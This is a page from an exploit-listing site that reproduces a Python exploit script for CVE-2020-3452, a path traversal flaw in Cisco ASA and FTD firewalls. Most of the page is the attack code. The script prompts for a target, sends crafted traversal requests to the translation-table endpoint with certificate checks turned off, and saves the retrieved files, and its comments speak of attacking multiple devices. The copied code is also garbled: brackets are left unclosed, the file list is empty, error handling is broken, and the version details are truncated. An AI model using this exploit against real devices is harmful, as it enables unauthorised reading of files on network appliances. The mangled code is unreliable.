Cisco ASA / FTD Path Traversal

CVE Category Price Severity
CVE-2020-3452 CWE-22 Not disclosed High
Author Risk Exploitation Type Date
Orange Tsai High Remote 2020-12-15
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.05 0.57887

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

Cisco ASA / FTD Path Traversal
# Exploit Title: Cisco ASA and FTD - Path Traversal (2)
# Date: 12 Dec 2020
# Exploit Author: [email protected]
# Vendor Homepage:
# Software Link: Its against Hardware, specifically ASAs and FTDs
# Version: ASAs (from version 9.6 to and FTDs (versions 6.2.3 to
# Tested on: exploit runs on Python3 on OSX and on Kali Linux against cisco ASA 9.14
# CVE : CVE-2020-3452
# Github :

import requests

# Written by freakyclown for @CygentaHQ
# Cisco ASA Path Traversal
# CVE-2020-3452
# Usage: {target}"
# Example:"
# Requires - Requests - pip3 install requests
# This tool takes advantage of the above cve and attempts to
# download files as listed below, it is suggested that you make
# a working folder for the outputfiles to avoid confusion if
# attacking mutliple ASA's

# set your target
target = input("Enter target IP/Url: ")

def grabstuff():
    for file in files:
        print("trying: ", file)

        #set request parameters
        params = (
            ('type', 'mst'),
            ('textdomain', '+CSCOE+/'+file),
            ('default-language', ''),
            ('lang', '../'),

        # set the response to the result of the request, inputting in target and params and ignoring ssl cert problems
        response = requests.get('https://'+target+'/+CSCOT+/translation-table', params=params, verify=False)
        # write the file to the disk
        f = open(file,"w")

# this is a list of files available to download, more will be added in time
# if anyone has a list of ASA files, I'd be happy to add here
files = {

# obvious thing is obvious, try the things and barf if fail
except Exception as err:
    print("Something went wrong sorry")

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum